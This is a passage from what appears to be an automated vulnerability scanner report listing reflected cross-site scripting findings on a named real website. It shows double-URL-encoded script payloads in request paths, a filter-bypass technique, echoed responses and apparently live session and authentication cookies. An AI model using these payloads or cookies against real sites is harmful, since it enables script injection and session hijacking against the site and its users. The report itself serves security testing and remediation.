Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8977b";alert(1)//9f89e2c44cf/medialib/labware/labware-icons/bottles","E404") ;
   </script>
...[SNIP]...

1.344. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6867%2522%253balert%25281%2529%252f%252ff01418ab3cd was submitted in the REST URL parameter 2. This input was echoed as d6867";alert(1)//f01418ab3cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibd6867%2522%253balert%25281%2529%252f%252ff01418ab3cd/labware/labware-icons/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibd6867";alert(1)//f01418ab3cd/labware/labware-icons/bottles","E404") ;
   </script>
...[SNIP]...

1.345. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab648%2522%253balert%25281%2529%252f%252f0f1de7efb91 was submitted in the REST URL parameter 3. This input was echoed as ab648";alert(1)//0f1de7efb91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwareab648%2522%253balert%25281%2529%252f%252f0f1de7efb91/labware-icons/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwareab648";alert(1)//0f1de7efb91/labware-icons/bottles","E404") ;
   </script>
...[SNIP]...

1.346. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47470%2522%253balert%25281%2529%252f%252faec1e8d6636 was submitted in the REST URL parameter 4. This input was echoed as 47470";alert(1)//aec1e8d6636 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons47470%2522%253balert%25281%2529%252f%252faec1e8d6636/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:51 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons47470";alert(1)//aec1e8d6636/bottles","E404") ;
   </script>
...[SNIP]...

1.347. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e058%2522%253balert%25281%2529%252f%252f243d8772e was submitted in the REST URL parameter 5. This input was echoed as 9e058";alert(1)//243d8772e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/bottles9e058%2522%253balert%25281%2529%252f%252f243d8772e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:53 GMT
Content-Length: 28944
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/bottles9e058";alert(1)//243d8772e","E404") ;
   </script>
...[SNIP]...

1.348. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 694f6%2522%253balert%25281%2529%252f%252f3ccebd517b4 was submitted in the REST URL parameter 1. This input was echoed as 694f6";alert(1)//3ccebd517b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc694f6%2522%253balert%25281%2529%252f%252f3ccebd517b4/medialib/labware/labware-icons/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
